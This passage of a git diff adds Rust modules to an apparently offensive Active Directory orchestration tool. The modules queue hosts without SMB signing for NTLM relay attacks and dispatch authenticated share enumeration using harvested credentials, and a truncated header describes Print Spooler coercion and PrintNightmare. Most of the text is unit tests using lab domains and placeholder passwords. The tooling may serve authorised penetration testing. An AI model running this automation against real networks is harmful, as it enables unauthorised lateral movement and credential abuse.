"fabrikam.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = 
StateInner::new("test-op".into());
+        state
+            .domain_controllers
+            .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+        state
+            .credentials
+            .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        let work = collect_sid_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].dedup_key, "sid_enum:contoso.local");
+    }
+
+    #[tokio::test]
+    async fn collect_via_shared_state() {
+        let shared = SharedState::new("test-op".into());
+        {
+            let mut state = shared.write().await;
+            state
+                .domain_controllers
+                .insert("contoso.local".into(), "192.168.58.10".into());
+            state
+                .credentials
+                .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        }
+        let state = shared.read().await;
+        let work = collect_sid_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "contoso.local");
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/smb_signing.rs b/ares-cli/src/orchestrator/automation/smb_signing.rs
new file mode 100644
index 00000000..909f41f0
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/smb_signing.rs
@@ -0,0 +1,279 @@
+//! auto_smb_signing_detection -- bridge recon host data to VulnerabilityInfo.
+//!
+//! The SMB banner parser (`hosts.rs`) detects `(signing:True)` to mark DCs but
+//! does NOT create VulnerabilityInfo objects for hosts with signing disabled.
+//! This module scans `state.hosts` for non-DC hosts (signing:False is the default
+//! for member servers) and publishes `smb_signing_disabled` vulns, which the
+//! `ntlm_relay` module consumes to dispatch relay attacks.
+//!
+//! Pattern: mirrors `auto_mssql_detection` — scan host list, publish vulns.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::StateInner;
+
+/// Work item for SMB signing detection.
+struct SmbSigningWork {
+    ip: String,
+    hostname: String,
+    domain: String,
+}
+
+fn collect_smb_signing_work(state: &StateInner) -> Vec<SmbSigningWork> {
+    state
+        .hosts
+        .iter()
+        .filter(|h| {
+            // Non-DC hosts with SMB (port 445) likely have signing disabled.
+            // DCs enforce signing:True; member servers default to signing not required.
+            !h.is_dc
+                && !h.hostname.is_empty()
+                && !state
+                    .discovered_vulnerabilities
+                    .contains_key(&format!("smb_signing_{}", h.ip.replace('.', "_")))
+        })
+        .map(|h| {
+            let domain = h
+                .hostname
+                .find('.')
+                .map(|i| h.hostname[i + 1..].to_lowercase())
+                .unwrap_or_default();
+            SmbSigningWork {
+                ip: h.ip.clone(),
+                hostname: h.hostname.clone(),
+                domain,
+            }
+        })
+        .collect()
+}
+
+/// Scans discovered hosts for SMB signing disabled (non-DC Windows hosts).
+/// DCs enforce signing; member servers typically do not.
+/// Interval: 30s.
+pub async fn auto_smb_signing_detection(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("smb_signing_disabled") { + continue; + } + + let work = { + let state = dispatcher.state.read().await; + collect_smb_signing_work(&state) + }; + + for item in work { + let vuln = ares_core::models::VulnerabilityInfo { + vuln_id: format!("smb_signing_{}", item.ip.replace('.', "_")), + vuln_type: "smb_signing_disabled".to_string(), + target: item.ip.clone(), + discovered_by: "auto_smb_signing_detection".to_string(), + discovered_at: chrono::Utc::now(), + details: { + let mut d = std::collections::HashMap::new(); + d.insert("target_ip".to_string(), json!(item.ip)); + d.insert("ip".to_string(), json!(item.ip)); + if !item.hostname.is_empty() { + d.insert("hostname".to_string(), json!(item.hostname)); + } + if !item.domain.is_empty() { + d.insert("domain".to_string(), json!(item.domain)); + } + d + }, + recommended_agent: "coercion".to_string(), + priority: dispatcher.effective_priority("smb_signing_disabled"), + }; + + match dispatcher + .state + .publish_vulnerability_with_strategy( + &dispatcher.queue, + vuln, + Some(&dispatcher.config.strategy), + ) + .await + { + Ok(true) => { + info!(ip = %item.ip, hostname = %item.hostname, "SMB signing disabled — vulnerability queued for relay"); + } + Ok(false) => {} // already exists + Err(e) => { + warn!(err = %e, ip = %item.ip, "Failed to publish SMB signing vulnerability") + } + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + fn make_host(ip: &str, hostname: &str, is_dc: bool) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc, + owned: false, + } + } + + #[test] + fn vuln_id_format() { + let ip = "192.168.58.22"; + let vuln_id = format!("smb_signing_{}", ip.replace('.', "_")); + assert_eq!(vuln_id, "smb_signing_192_168_58_22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_non_dc_host_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + let work = collect_smb_signing_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_dc_host_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.10", "dc01.contoso.local", true)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_empty_hostname_skipped() { + let mut state = StateInner::new("test-op".into()); + state.hosts.push(make_host("192.168.58.22", "", false)); + let work = collect_smb_signing_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_already_discovered_vuln_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local", false)); + // Simulate 
existing vulnerability
+        state.discovered_vulnerabilities.insert(
+            "smb_signing_192_168_58_22".into(),
+            ares_core::models::VulnerabilityInfo {
+                vuln_id: "smb_signing_192_168_58_22".into(),
+                vuln_type: "smb_signing_disabled".into(),
+                target: "192.168.58.22".into(),
+                discovered_by: "test".into(),
+                discovered_at: chrono::Utc::now(),
+                details: std::collections::HashMap::new(),
+                recommended_agent: "coercion".into(),
+                priority: 5,
+            },
+        );
+        let work = collect_smb_signing_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[test]
+    fn collect_multiple_hosts_mixed_dc_and_member() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .hosts
+            .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+        state
+            .hosts
+            .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+        state
+            .hosts
+            .push(make_host("192.168.58.23", "srv02.contoso.local", false));
+        let work = collect_smb_signing_work(&state);
+        assert_eq!(work.len(), 2);
+        let ips: Vec<&str> = work.iter().map(|w| w.ip.as_str()).collect();
+        assert!(ips.contains(&"192.168.58.22"));
+        assert!(ips.contains(&"192.168.58.23"));
+        assert!(!ips.contains(&"192.168.58.10"));
+    }
+
+    #[test]
+    fn collect_host_without_fqdn_gets_empty_domain() {
+        let mut state = StateInner::new("test-op".into());
+        state.hosts.push(make_host("192.168.58.22", "srv01", false));
+        let work = collect_smb_signing_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "");
+    }
+
+    #[test]
+    fn collect_skips_vuln_keeps_clean() {
+        let mut state = StateInner::new("test-op".into());
+        state
+            .hosts
+            .push(make_host("192.168.58.22", "srv01.contoso.local", false));
+        state
+            .hosts
+            .push(make_host("192.168.58.23", "srv02.contoso.local", false));
+        // Only 192.168.58.22 has existing vuln
+        state.discovered_vulnerabilities.insert(
+            "smb_signing_192_168_58_22".into(),
+            ares_core::models::VulnerabilityInfo {
+                vuln_id: "smb_signing_192_168_58_22".into(),
+                vuln_type: "smb_signing_disabled".into(),
+                target: "192.168.58.22".into(),
+                discovered_by: "test".into(),
+                discovered_at: chrono::Utc::now(),
+                details: std::collections::HashMap::new(),
+                recommended_agent: "coercion".into(),
+                priority: 5,
+            },
+        );
+        let work = collect_smb_signing_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].ip, "192.168.58.23");
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/smbclient_enum.rs b/ares-cli/src/orchestrator/automation/smbclient_enum.rs
new file mode 100644
index 00000000..3379d0dc
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/smbclient_enum.rs
@@ -0,0 +1,745 @@
+//! auto_smbclient_enum -- authenticated SMB share listing per domain.
+//!
+//! Complements auto_share_enumeration by using authenticated sessions to
+//! discover shares that require credentials. Uses smbclient or netexec
+//! to list shares on all known hosts.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
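As a concrete reference for what "authenticated share listing" means on the worker side, here is a sketch of the kind of invocation a recon worker might issue; assuming netexec's CLI shape (`-u`/`-p`/`-d` and `--shares`), its share listing yields exactly the host/name/permissions triple the `Share` model carries. The helper is hypothetical; nothing in this diff shells out directly, the orchestrator only enqueues the payload:

```rust
use std::process::Command;

/// Hypothetical: build a netexec share-listing command for one host.
/// Assumes netexec is on PATH; output parsing happens elsewhere.
fn netexec_shares(ip: &str, user: &str, pass: &str, domain: &str) -> Command {
    let mut cmd = Command::new("netexec");
    cmd.args(["smb", ip, "-u", user, "-p", pass, "-d", domain, "--shares"]);
    cmd
}
```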
+/// Collect SMB enumeration work items from current state.
+///
+/// Pure logic extracted from the async loop so it can be unit-tested
+/// without a Dispatcher or runtime.
+fn collect_smbclient_work(state: &crate::orchestrator::state::StateInner) -> Vec<SmbEnumWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for host in &state.hosts {
+        // Check if host has SMB
+        let has_smb = host.services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        if !has_smb {
+            continue;
+        }
+
+        let dedup_key = format!("smb_auth_enum:{}", host.ip);
+        if state.is_processed(DEDUP_SMBCLIENT_ENUM, &dedup_key) {
+            continue;
+        }
+
+        // Infer domain from hostname
+        let domain = host
+            .hostname
+            .find('.')
+            .map(|i| host.hostname[i + 1..].to_string())
+            .unwrap_or_default();
+
+        // Pick a credential for this domain
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| {
+                !domain.is_empty()
+                    && c.domain.to_lowercase() == domain.to_lowercase()
+                    && !c.password.is_empty()
+                    && !state.is_credential_quarantined(&c.username, &c.domain)
+            })
+            .or_else(|| {
+                state.credentials.iter().find(|c| {
+                    !c.password.is_empty()
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                })
+            }) {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(SmbEnumWork {
+            dedup_key,
+            target_ip: host.ip.clone(),
+            hostname: host.hostname.clone(),
+            domain,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Dispatches authenticated SMB share enumeration per host.
+/// Interval: 45s.
+pub async fn auto_smbclient_enum(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("smbclient_enum") {
+            continue;
+        }
+
+        let work: Vec<SmbEnumWork> = {
+            let state = dispatcher.state.read().await;
+            let items = collect_smbclient_work(&state);
+            if items.is_empty() {
+                continue;
+            }
+            items
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "authenticated_share_enumeration",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("smbclient_enum");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        host = %item.target_ip,
+                        "Authenticated SMB share enumeration dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_SMBCLIENT_ENUM, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_SMBCLIENT_ENUM, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(host = %item.target_ip, "SMB auth enum deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, host = %item.target_ip, "Failed to dispatch SMB auth enum");
+                }
+            }
+        }
+    }
+}
+
+struct SmbEnumWork {
+    dedup_key: String,
+    target_ip: String,
+    hostname: String,
+    domain: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::orchestrator::state::SharedState;
+
+    /// Helper: create a credential for tests.
+ fn make_cred(user: &str, pass: &str, domain: &str) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{user}"), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + /// Helper: create a host with given services. + fn make_host(ip: &str, hostname: &str, services: Vec<&str>) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: vec![], + services: services.into_iter().map(String::from).collect(), + is_dc: false, + owned: false, + } + } + + // ---- collect_smbclient_work tests ---- + + #[tokio::test] + async fn collect_empty_state_returns_nothing() { + let shared = SharedState::new("op-test".into()); + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_smb_hosts_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_host_single_cred() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "smb_auth_enum:192.168.58.10"); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb", "80/tcp http"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.20")); + } + + #[tokio::test] + async fn collect_dedup_skips_already_processed() { + let shared = 
SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[tokio::test] + async fn collect_prefers_same_domain_credential() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("con_user", "Con123!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[tokio::test] + async fn collect_falls_back_to_any_credential_when_no_domain_match() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_skips_empty_password_falls_back() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds"], + )); + state + .credentials + .push(make_cred("admin", "", "contoso.local")); + state + .credentials + .push(make_cred("fab_user", "Fab123!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fab_user"); + } + + #[tokio::test] + async fn collect_bare_hostname_empty_domain() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state + .hosts + .push(make_host("192.168.58.10", "srv01", vec!["445/tcp smb"])); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + 
assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_cifs_service_detected() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "nas01.contoso.local", + vec!["cifs file share"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_case_insensitive_domain_matching() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.CONTOSO.LOCAL", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "CONTOSO.LOCAL"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[tokio::test] + async fn collect_mixed_smb_and_non_smb_hosts() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp microsoft-ds", "88/tcp kerberos"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "web01.contoso.local", + vec!["80/tcp http", "443/tcp https"], + )); + state.hosts.push(make_host( + "192.168.58.30", + "sql01.contoso.local", + vec!["1433/tcp mssql", "445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(!ips.contains(&"192.168.58.20")); + assert!(ips.contains(&"192.168.58.30")); + } + + #[tokio::test] + async fn collect_all_deduped_returns_nothing() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "srv01.contoso.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.10".into()); + state.mark_processed(DEDUP_SMBCLIENT_ENUM, "smb_auth_enum:192.168.58.20".into()); + } + let state = shared.read().await; + let work = collect_smbclient_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_cross_domain_hosts_get_correct_creds() { + let shared = SharedState::new("op-test".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "dc01.contoso.local", + vec!["445/tcp smb"], + )); + state.hosts.push(make_host( + "192.168.58.20", + "dc02.fabrikam.local", + vec!["445/tcp smb"], + )); + state + .credentials + .push(make_cred("con_admin", "ConPass!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_cred("fab_admin", "FabPass!", "fabrikam.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = 
collect_smbclient_work(&state);
+        assert_eq!(work.len(), 2);
+
+        let contoso_work = work
+            .iter()
+            .find(|w| w.target_ip == "192.168.58.10")
+            .unwrap();
+        assert_eq!(contoso_work.credential.username, "con_admin");
+
+        let fabrikam_work = work
+            .iter()
+            .find(|w| w.target_ip == "192.168.58.20")
+            .unwrap();
+        assert_eq!(fabrikam_work.credential.username, "fab_admin");
+    }
+
+    #[tokio::test]
+    async fn collect_only_empty_password_creds_returns_nothing() {
+        let shared = SharedState::new("op-test".into());
+        {
+            let mut state = shared.write().await;
+            state.hosts.push(make_host(
+                "192.168.58.10",
+                "dc01.contoso.local",
+                vec!["445/tcp smb"],
+            ));
+            state
+                .credentials
+                .push(make_cred("user1", "", "contoso.local"));
+            state
+                .credentials
+                .push(make_cred("user2", "", "fabrikam.local"));
+        }
+        let state = shared.read().await;
+        let work = collect_smbclient_work(&state);
+        assert!(work.is_empty());
+    }
+
+    #[tokio::test]
+    async fn collect_host_with_empty_services() {
+        let shared = SharedState::new("op-test".into());
+        {
+            let mut state = shared.write().await;
+            state
+                .hosts
+                .push(make_host("192.168.58.10", "dc01.contoso.local", vec![]));
+            state
+                .credentials
+                .push(make_cred("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        }
+        let state = shared.read().await;
+        let work = collect_smbclient_work(&state);
+        assert!(work.is_empty());
+    }
+
+    // ---- original tests ----
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("smb_auth_enum:{}", "192.168.58.10");
+        assert_eq!(key, "smb_auth_enum:192.168.58.10");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_SMBCLIENT_ENUM, "smbclient_enum");
+    }
+
+    #[test]
+    fn smb_service_detection() {
+        let services = [
+            "445/tcp microsoft-ds".to_string(),
+            "80/tcp http".to_string(),
+        ];
+        let has_smb = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        assert!(has_smb);
+    }
+
+    #[test]
+    fn smb_service_detection_by_name() {
+        let services = ["microsoft-ds smb".to_string()];
+        let has_smb = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        assert!(has_smb);
+    }
+
+    #[test]
+    fn no_smb_service() {
+        let services = [
+            "3389/tcp ms-wbt-server".to_string(),
+            "80/tcp http".to_string(),
+        ];
+        let has_smb = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        assert!(!has_smb);
+    }
+
+    #[test]
+    fn domain_from_hostname_preserves_case() {
+        // smbclient_enum uses to_string() not to_lowercase() for domain
+        let hostname = "srv01.CONTOSO.LOCAL";
+        let domain = hostname
+            .find('.')
+            .map(|i| hostname[i + 1..].to_string())
+            .unwrap_or_default();
+        assert_eq!(domain, "CONTOSO.LOCAL");
+    }
+
+    #[test]
+    fn smb_service_detection_cifs() {
+        let services = ["cifs share".to_string()];
+        let has_smb = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        assert!(has_smb);
+    }
+
+    #[test]
+    fn domain_from_bare_hostname() {
+        let hostname = "srv01";
+        let domain = hostname
+            .find('.')
+            .map(|i| hostname[i + 1..].to_string())
+            .unwrap_or_default();
+        assert_eq!(domain, "");
+    }
+
+    #[test]
+    fn smb_enum_payload_structure() {
+        let payload = serde_json::json!({
+            "technique": "authenticated_share_enumeration",
+            "target_ip": "192.168.58.22",
+            "hostname": "srv01.contoso.local",
+            "domain": "contoso.local",
+            "credential": {
+                "username": "admin",
+                "password": "P@ssw0rd!",
+                "domain": "contoso.local",
+            },
+        });
+        assert_eq!(payload["technique"], "authenticated_share_enumeration");
+        assert_eq!(payload["target_ip"], "192.168.58.22");
+        assert_eq!(payload["credential"]["username"], "admin");
+    }
+
+    #[test]
+    fn credential_domain_matching_case_insensitive() {
+        let domain = "contoso.local";
+        let cred_domain = "CONTOSO.LOCAL";
+        assert_eq!(cred_domain.to_lowercase(), domain.to_lowercase());
+    }
+
+    #[test]
+    fn credential_domain_matching_empty_skips() {
+        let domain = "".to_string();
+        let cred_domain = "contoso.local";
+        let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+        assert!(!matches);
+    }
+
+    #[test]
+    fn smb_enum_work_construction() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let work = SmbEnumWork {
+            dedup_key: "smb_auth_enum:192.168.58.22".into(),
+            target_ip: "192.168.58.22".into(),
+            hostname: "srv01.contoso.local".into(),
+            domain: "contoso.local".into(),
+            credential: cred,
+        };
+        assert_eq!(work.target_ip, "192.168.58.22");
+        assert_eq!(work.credential.username, "admin");
+    }
+
+    #[test]
+    fn empty_services_no_smb() {
+        let services: Vec<String> = vec![];
+        let has_smb = services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        assert!(!has_smb);
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/spooler_check.rs b/ares-cli/src/orchestrator/automation/spooler_check.rs
new file mode 100644
index 00000000..4815cfb2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/spooler_check.rs
@@ -0,0 +1,376 @@
+//! auto_spooler_check -- detect Print Spooler service on discovered hosts.
+//!
+//! The Print Spooler service (MS-RPRN) is a common coercion vector: if running,
+//! PrinterBug (SpoolSample) can force the machine to authenticate to an attacker
+//! listener. It's also a prerequisite for PrintNightmare (CVE-2021-1675).
+//!
